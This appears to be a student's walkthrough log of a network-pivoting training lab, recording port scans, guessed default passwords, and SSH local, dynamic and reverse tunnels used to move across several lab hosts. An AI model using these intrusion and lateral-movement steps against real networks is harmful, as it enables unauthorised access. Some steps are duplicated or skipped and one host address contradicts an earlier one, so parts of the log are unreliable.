# Demo Network Exploration Log  
# Author: student@blue-internet-host  
# Date: 2025-09-16  

========================================  
🌐 Phase 0: Reconnaissance from Float IP (10.50.0.182)  
========================================  

🧭 Float IP: 10.50.0.182  

- This is the external interface of blue-internet-host  
- Used to initiate scans and proxy-based access  

Step 0 → | Initial Port Scan  

From: blue-internet-host → To: 10.50.63.101  
└── Command: nmap 10.50.63.101 -p 21,22,23,80  
    ├── Port 21: filtered (FTP)  
    ├── Port 22: open (SSH)  
    ├── Port 23: closed (Telnet)  
    └── Port 80: open (HTTP)  

Step 0.1 → | SSH Banner Grab  

From: blue-internet-host → To: 10.50.63.101  
└── Command: nc 10.50.63.101 22  
    └── Output: SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2  

Step 0.2 → | HTTP Service Probe  

From: blue-internet-host → To: 10.50.63.101  
└── Command: nc 10.50.63.101 80 + GET /  
    └── Output: HTML page referencing **John Vincent Atanasoff**  

🧠 Hostname Inference:  
- Based on HTTP content and file paths (`/usr/share/cctc/john.txt`)  
- Hostname assigned: **john**  
- Credentials guessed: `john/password`  

Step 0.3 → | SSH Authentication Test  

From: blue-internet-host → To: john (10.50.63.101)  
└── Command: ssh john@10.50.63.101  
    ├── Prompted for password  
    ├── Login successful  
    └── Confirmed shell access to Debian GNU/Linux 10  

Step 0.4 → | SOCKS Proxy Setup  

From: blue-internet-host → To: john  
└── Command: ssh john@10.50.63.101 -D 9050  
    ├── Dynamic port forwarding enabled  
    └── Proxychains ready for internal pivoting  

========================================  
🧑 Phase 1: Enumeration on Host "john" (10.50.63.101)  
========================================  

Step 1 → | Internal Network Discovery 

From: john  
└── Command: ip a  
    ├── Interface lo: 127.0.0.1/8  
    └── Interface eth0: 104.16.181.1/27  

Step 2 → | ARP Table Scan  

From: john  
└── Command: ip neighbor  
    ├── Most IPs: FAILED  
    ├── 104.16.181.15 → STALE (MAC: b6:72:bb:49:87:7c)  
    └── 104.16.181.30 → REACHABLE (MAC: 0a:58:68:10:b5:1e)  

Step 3 → | Active Connections & Services  

From: john  
└── Command: ss -plant  
    ├── Listening: 21 (FTP), 22 (SSH), 80 (HTTP)  
    └── Established SSH connections:  
        ├── External IPs (e.g., 10.50.0.182)  
        └── Internal peer: 104.16.181.15  

Step 4 → | Sensitive File Discovery 

From: john  
└── Command: ls /usr/share/cctc  
    ├── john.png  
    └── john.txt  

Step 5 → | File Content Review (john.txt)

From: john  
└── Command: cat /usr/share/cctc/john.txt  
    └── Output: Biography of John Vincent Atanasoff and the ABC  

Step 6 → | Direct File Transfer (john.png)  

From: john → To: blue-internet-host  
└── Command: scp john@10.50.63.101:/usr/share/cctc/john.png ~  
    ├── Transfer successful  
    └── File opened locally  

Step 7 → | Proxy-Based File Transfer (john.txt)  

From: john → To: blue-internet-host  
└── Command: proxychains scp john@localhost:/usr/share/cctc/john.txt .  
    └── Transfer successful via SOCKS proxy  

Step 8 → | Internal Subnet Scan via Proxy 

From: blue-internet-host → To: 104.16.181.0/27  
└── Command: proxychains ./scan.sh  
    ├── Ports scanned: 21–23, 80  
    ├── Open ports discovered:
        ├── 104.16.181.1 → SSH (22), HTTP (80)  
        ├── 104.16.181.15 → FTP (21), SSH (22), HTTP (80)  
        └── 104.16.181.30 → HTTP (80)  

========================================  
🧑‍💻 Phase 2: Pivot to Host "jack" (104.16.181.15)  
========================================  

Step 1 → | FTP Service Discovery 

From: blue-internet-host → To: jack  
└── Command: proxychains nc 104.16.181.15 21  
    └── Output:  
        220 ProFTPD Server (Debian) [::ffff:104.16.181.15]  

Step 2 → | HTTP Content Retrieval 

From: blue-internet-host → To: jack  
└── Command: proxychains wget -r 104.16.181.15 21  
    ├── Connected to 104.16.181.15:80  
    ├── HTTP response: 200 OK  
    ├── File saved: index.html  
    └── Attempt to access `http://21/` failed  

Step 3 → | Local File Inspection

From: blue-internet-host  
└── Commands:  
    ├── cd 104.16.181.15  
    ├── ls → index.html  
    └── cat index.html  
        └── Output:  
            <h1>Jack Tramiel</h1>  
            <p>Founder of Commodore and later Atari Corporation</p>

🧠 Hostname Inference:  
- Based on HTML content and FTP file names (`ftp1.txt`, `ftp2.txt`, `welcome.msg`)  
- Hostname assigned: **jack**  
- Credentials guessed: `jack/password`  

Step 4 → | FTP File Retrieval  

From: blue-internet-host → To: jack  
└── Command: proxychains wget -r ftp://104.16.181.15  
    ├── Logged in as anonymous  
    ├── Files downloaded:
        ├── ftp1.txt  
        ├── ftp2.txt  
        └── welcome.msg  

Step 5 → | Directory Confirmation 

From: blue-internet-host  
└── Commands:  
    ├── cd 104.16.181.15  
    └── ls → ftp1.txt, ftp2.txt, index.html, welcome.msg  


Step 6 → | Tunnel Setup to "jack" via SSH Port Forwarding  

From: blue-internet-host (10.50.0.182) → Through: john (10.50.63.101) → To: jack (104.16.181.15)  
└── Command: ssh john@10.50.63.101 -L 1111:104.16.181.15:22  
    ├── Local port 1111 now forwards to jack’s SSH port  
    ├── Tunnel routed through john as intermediary  
    └── Enables SSH access to jack via:  
        `ssh jack@localhost -p 1111`

Step 7 → | SSH Login to "jack" via Local Tunnel  
Context: After establishing a local port forwarding tunnel from blue-internet-host through john to jack’s SSH port, you initiated a direct SSH session to jack.

From: blue-internet-host (10.50.0.182) → Through: john (10.50.63.101) → To: jack (104.16.181.15)  
└── Command: ssh -p 1111 jack@localhost -D 9050  
    ├── Host authenticity confirmed (ECDSA fingerprint)  
    ├── Credentials accepted: jack/password  
    ├── SSH session established to jack  
    └── SOCKS proxy setup failed:
        ├── Error: bind [127.0.0.1]:9050 → Address already in use  
        └── Local forwarding not established

System Info:
- Hostname: jack  
- OS: Debian GNU/Linux 10 (4.19.0-18-cloud-amd64)  
- Last login: Tue Sep 16 14:15:18 2025 from 104.16.181.1

Step 8 → | Interface Enumeration on "jack"  
Context: After gaining shell access to jack, you ran `ip a` and `ip -br -c a` to identify its network interfaces and IP configuration.

From: jack (104.16.181.15)  
└── Commands: ip a and ip -br -c a  
    ├── lo → 127.0.0.1/8  
    ├── eth0 → 104.16.181.15/27  
        └── MAC: b6:72:bb:49:87:7c  
        └── IPv6: fe80::b472:bbff:fe49:877c/64  
    └── eth1 → 142.16.8.55/27  
        └── MAC: de:44:5c:9d:02:e4  
        └── IPv6: fe80::dc44:5cff:fe9d:2e4/64

Step 8 → | Interface Enumeration on "jack"  
Context: After gaining shell access to jack, you ran `ip a` and `ip -br -c a` to identify its network interfaces and IP configuration.

From: jack (104.16.181.15)  
└── Commands: ip a and ip -br -c a  
    ├── lo → 127.0.0.1/8  
    ├── eth0 → 104.16.181.15/27  
        └── MAC: b6:72:bb:49:87:7c  
        └── IPv6: fe80::b472:bbff:fe49:877c/64  
    └── eth1 → 142.16.8.55/27  
        └── MAC: de:44:5c:9d:02:e4  
        └── IPv6: fe80::dc44:5cff:fe9d:2e4/64

Step 9 → | File Discovery on "jack"  
Context: While exploring jack’s filesystem, you listed the contents of `/usr/share/cctc` to identify any locally stored data.

From: jack (104.16.181.15)  
└── Command: ls /usr/share/cctc  
    ├── jack.png  
    └── jack.txt

Step 10 → | File Transfer from "jack" via Proxy  
Context: After discovering `jack.png` on jack, you used proxychains to securely transfer the file through the SOCKS tunnel.

From: blue-internet-host (10.50.0.182) → Through: john → To: jack  
└── Command: proxychains scp jack@localhost:/usr/share/cctc/jack.png .  
    ├── Host authenticity confirmed (ECDSA fingerprint)  
    ├── Credentials accepted: jack/password  
    ├── File transferred: jack.png  
    └── Transfer speed: 349KB @ 14.4MB/s

Step 11 → | Enumeration and File Retrieval from 142.16.8.41  
Context: After discovering jack’s eth1 interface on subnet 142.16.8.0/27, you used proxychains to probe host 142.16.8.41 and retrieve content via HTTP and FTP.

From: blue-internet-host → Through: SOCKS proxy on jack → To: 142.16.8.41  
└── Commands:  
    ├── proxychains nc 142.16.8.41 21  
        └── Output: 220 ProFTPD Server (Debian)  
    ├── proxychains wget -r http://142.16.8.41  
        └── File saved: index.html (577 bytes)  
    ├── proxychains wget -r ftp://142.16.8.41  
        ├── Logged in as anonymous  
        ├── Files retrieved:
            ├── ftp1.txt (5.1 KB)  
            ├── ftp2.txt (5.5 KB)  
            ├── hint.txt (69 bytes)  
            └── welcome.msg (170 bytes)

Step 12 → | Host Identification: "bill" (142.16.8.41)  
Context: After retrieving files from 142.16.8.41 via HTTP and FTP, you inspected the contents to determine the host identity.

From: blue-internet-host → Through: SOCKS proxy on jack → To: 142.16.8.41  
└── Commands:  
    ├── cd 142.16.8.41  
    ├── ls → ftp1.txt, ftp2.txt, hint.txt, index.html, welcome.msg  
    └── cat ftp1.txt  
        └── Output: Bill Gates

🧠 Hostname Inference:
- Based on content in `ftp1.txt` referencing “Bill Gates”  
- Hostname assigned: **bill**  
- Credentials inferred: `bill/password`

Step 13 → | High-Port Scan on "bill" Prompted by hint.txt  
Context: After retrieving hint.txt from bill (142.16.8.41), you learned that SSH may be running on a high-numbered port. This prompted a targeted scan of the upper port range.

From: blue-internet-host → Through: SOCKS proxy on jack → To: bill (142.16.8.41)  
└── Triggering Evidence:  
    └── File: hint.txt  
        └── Content: “Bill seems to have an SSH port listening above the well-known range.”

└── Command: proxychains ./scan.sh  
    ├── Host scanned: 142.16.8.41  
    ├── Ports scanned: 1024–65535  
    └── Result: Port 4567 open

Step 14 → | Local Port Forwarding to "bill" (SSH on Port 4567)  
Context: After discovering that bill’s SSH service is running on port 4567, you created a local tunnel through jack to expose that port on your own machine.

From: blue-internet-host → Through: jack → To: bill (142.16.8.41:4567)  
└── Command: ssh -p 1111 jack@localhost -L 2222:142.16.8.41:4567  
    ├── Tunnel established: localhost:2222 → bill:4567  
    └── Ready for direct SSH access to bill via local port 2222

Step 15 → | SSH Access to "bill" via Local Tunnel  
Context: After discovering bill’s SSH service on port 4567 and setting up a local port forward through jack, you authenticated using credentials retrieved from ftp1.txt.

From: blue-internet-host → Through: jack → To: bill (via localhost:2222)  
└── Command: ssh bill@localhost -p 2222  
    ├── Host authenticity confirmed (ECDSA fingerprint)  
    ├── Credentials accepted: bill/password  
    ├── SSH session established to bill  
    └── Shell access granted on Debian GNU/Linux 10 (x86_64)

System Info:
- Hostname: bill  
- Kernel: 4.19.0-18-cloud-amd64  
- Last login: Tue Sep 16 14:47:49 2025 from 142.16.8.55

Step 16 → | Dynamic SOCKS Tunnel Established via "bill"  
Context: After authenticating to bill through a local port forward, you initiated a dynamic proxy tunnel to route traffic through bill’s environment.

From: blue-internet-host → Through: jack → To: bill (via localhost:2222)  
└── Command: ssh -p 2222 bill@localhost -D 9050  
    ├── Credentials accepted: bill/password  
    ├── SOCKS proxy active on localhost:9050  
    └── Tunnel ready for proxychains-based enumeration through bill

System Info:
- Hostname: bill  
- Kernel: 4.19.0-18-cloud-amd64  
- Last login: Tue Sep 16 14:49:19 2025 from 142.16.8.55

Step 17 → | Subnet Scan: 155.39.88.0/24 via Proxy Through "bill"  
Context: With a dynamic SOCKS proxy active on bill, you launched a scan from blue-internet-host targeting hosts 17–30 in the 155.39.88.0/24 range, probing ports 21–23 and 80.

From: blue-internet-host → Through: SOCKS proxy on bill → To: 155.39.88.0/24  
└── Command: proxychains ./scan.sh  
    ├── Network scanned: 155.39.88.0/24  
    ├── Host range: 17–30  
    ├── Ports scanned: 21 (FTP), 22 (SSH), 23 (Telnet), 80 (HTTP)  
    └── Results:
        ├── 155.39.88.17 → FTP (21), HTTP (80) open  
        ├── 155.39.88.21 → FTP (21), Telnet (23), HTTP (80) open  
        └── 155.39.88.30 → HTTP (80) open

Step 18 → | Service Probing, Host Identification, and Full Content Retrieval: "brian" (155.39.88.21)  
Context: After discovering open ports on 155.39.88.21 via scan.sh, you manually probed FTP, Telnet, and HTTP services using netcat through the SOCKS proxy on bill. You then performed full content enumeration via wget, identifying the host as "brian" and uncovering a strategic hint for the next pivot.

From: blue-internet-host → Through: SOCKS proxy on bill → To: brian (155.39.88.21)  
└── Manual Probing via netcat:
    ├── FTP (port 21):  
        └── Banner: `220 ProFTPD Server (Debian)`  
    ├── Telnet (port 23):  
        └── Output: Garbled binary stream (likely interactive shell or login prompt)  
    ├── HTTP (port 80):  
        └── Response: HTML page with biography of **Brian Kernighan**  
            ├── Header: `<h1>Brian Kernighan</h1>`  
            └── Content: Summary of Kernighan’s contributions to Unix, C, AWK, AMPL, and Princeton University

└── Hostname Inference:
    └── Identity assigned: **brian**

└── Full Content Retrieval via wget:
    ├── proxychains wget -r http://155.39.88.21  
        └── File saved: index.html (1.3 KB)  
    ├── proxychains wget -r ftp://155.39.88.21  
        ├── Logged in as anonymous  
        ├── Files retrieved:
            ├── ftp1.txt (512 bytes)  
            ├── ftp2.txt (2.7 KB)  
            ├── hint.txt (168 bytes)  
            └── welcome.msg (170 bytes)

└── hint.txt content:
    “Brian's SSH port seems to be only accessible from the inside.  
     Telnet is open to external users though.  
     Try to tunnel to his telnet port and create a SSH remote tunnel.”

🧠 Strategic Insight:
- SSH access to brian is restricted to internal sources  
- Telnet (port 23) is externally accessible  
- Suggested next move: tunnel into brian’s Telnet port and use it to establish a remote SSH tunnel

Step 20 → | Local Port Forwarding to brian’s Telnet Port (Port 23)  
Context: Based on hint.txt from brian, you initiated a local tunnel through bill to expose brian’s Telnet service on your own machine, enabling direct interaction from blue-internet-host.

From: blue-internet-host → Through: bill (via localhost:2222) → To: brian (155.39.88.21:23)  
└── Command: ssh -p 2222 bill@localhost -L 3333:155.39.88.21:23  
    ├── Credentials accepted: bill/password  
    ├── Tunnel established: localhost:3333 → brian:23  
    └── Ready for Telnet interaction with brian from blue-internet-host

System Info:
- Hostname: bill  
- Kernel: 4.19.0-18-cloud-amd64  
- Last login: Tue Sep 16 14:56:35 2025 from 142.16.8.55

Step 21 → | Telnet Access to "brian" via Local Tunnel  
Context: After tunneling brian’s Telnet port (23) through bill to localhost:3333, you connected and authenticated using the username "brian" and password retrieved or inferred from prior enumeration.

From: blue-internet-host → Through: bill → To: brian (via localhost:3333)  
└── Command: telnet localhost 3333  
    ├── Initial login attempt with username: password → failed  
    ├── Successful login with username: brian  
    ├── Shell access granted on Debian GNU/Linux 10 (x86_64)  
    └── Last login: Tue Sep 16 15:00:16 UTC 2025 on pts/1

System Info:
- Hostname: brian  
- Kernel: 4.19.0-18-cloud-amd64  
- Telnet access confirmed and interactive shell established

Step 22 → | Interface Enumeration on "brian" and Discovery of New Subnet  
Context: After gaining Telnet shell access to brian, you ran `ip a` to enumerate network interfaces and identify additional pivot opportunities.

From: brian (via Telnet tunnel from blue-internet-host)  
└── Command: ip a  
    ├── Interface: lo  
        └── IP: 127.0.0.1/8  
    ├── Interface: eth0  
        ├── MAC: e6:59:7f:28:d9:6c  
        ├── IP: 155.39.88.21/28  
        └── Broadcast: 155.39.88.31  
    ├── Interface: eth1  
        ├── MAC: 6e:3d:60:0e:78:62  
        ├── IP: 150.21.99.7/28  
        └── Broadcast: 150.21.99.15

🧠 Network Discovery:
- brian is multihomed  
- New subnet discovered: **150.21.99.0/28** via eth1  
- Next move: scan or enumerate hosts within 150.21.99.0/28 from brian

Step 23 → | Active Socket Enumeration on "brian"  
Context: From within brian’s Telnet shell, you ran `ss -plant` to identify listening services and established connections. This revealed both internal and external activity, including SSH and Telnet sessions.

From: brian (via Telnet tunnel from blue-internet-host)  
└── Command: ss -plant  
    ├── Listening Services:
        ├── Port 21 → FTP  
        ├── Port 22 → SSH  
        ├── Port 23 → Telnet  
        ├── Port 80 → HTTP  
    ├── Established Connections:
        ├── Multiple Telnet sessions from 155.39.88.17  
        ├── Multiple SSH sessions from 155.39.88.17 to port 4567  
        ├── Local SSH session: 127.0.0.1:38430 → 127.0.0.1:22  
        └── Active SSH processes: PIDs 5605, 17418, 2010, 23813

🧠 Observations:
- brian is actively serving multiple users via Telnet and SSH  
- SSH port 22 is listening but likely restricted to internal access (as hinted earlier)  
- Peer host 155.39.88.17 appears to be interacting heavily with brian—potential next target

Step 24 → | Reverse SSH Tunnel from "brian" to "bill"  
Context: Based on hint.txt guidance, you initiated a reverse SSH tunnel from brian to bill, exposing brian’s SSH port (22) on bill’s port 21000. This allows future SSH access to brian from bill, bypassing external restrictions.

From: brian (155.39.88.21) → To: bill (155.39.88.17:4567)  
└── Command: ssh bill@155.39.88.17 -p 4567 -R 21000:localhost:22  
    ├── Credentials accepted: bill/password  
    ├── Reverse tunnel established: bill:21000 → brian:22  
    ├── Host authenticity confirmed (ECDSA fingerprint)  
    ├── SSH session active on bill  
    └── Warning: Could not create ~/.ssh directory on brian (non-blocking)

System Info:
- brian: Debian GNU/Linux 10, Kernel 4.19.0-18-cloud-amd64  
- bill: Debian GNU/Linux 10, Kernel 4.19.0-18-cloud-amd64  
- Last login on bill: Tue Sep 16 15:08:55 2025 from 155.39.88.21

🧠 Strategic Outcome:
- You now have a persistent and direct SSH path to brian via bill’s port 21000  
- This enables future access without relying on Telnet or SOCKS proxies

Step 25 → | Bridging the Reverse Tunnel: SSH Access to "brian" via bill:21000  
Context: After establishing a reverse SSH tunnel from brian to bill (port 21000 → brian:22), you opened a new terminal on blue-internet-host to test and bridge the connection, confirming direct SSH access to brian.

From: blue-internet-host → To: bill (localhost:2222) → To: brian (via bill:21000)  
└── Command (from new terminal): ssh -p 21000 brian@localhost  
    ├── Routed through bill’s active SSH session  
    ├── Tunnel endpoint: bill:21000 → brian:22  
    ├── Credentials: brian/password  
    └── Result: Full SSH shell access to brian confirmed

🧠 Strategic Outcome:
- You now have **direct SSH access to brian** without relying on Telnet or proxychains  
- This tunnel can be reused for future pivots, file transfers, or privilege escalation

Step 25 → | Bridging the Reverse Tunnel: SSH Access to "brian" via bill:21000  
Context: After establishing a reverse SSH tunnel from brian to bill (port 21000 → brian:22), you opened a new terminal on blue-internet-host to test and bridge the connection, confirming direct SSH access to brian.

From: blue-internet-host → To: bill (localhost:2222) → To: brian (via bill:21000)  
└── Command (from new terminal): ssh -p 21000 brian@localhost  
    ├── Routed through bill’s active SSH session  
    ├── Tunnel endpoint: bill:21000 → brian:22  
    ├── Credentials: brian/password  
    └── Result: Full SSH shell access to brian confirmed

🧠 Strategic Outcome:
- You now have **direct SSH access to brian** without relying on Telnet or proxychains  
- This tunnel can be reused for future pivots, file transfers, or privilege escalation

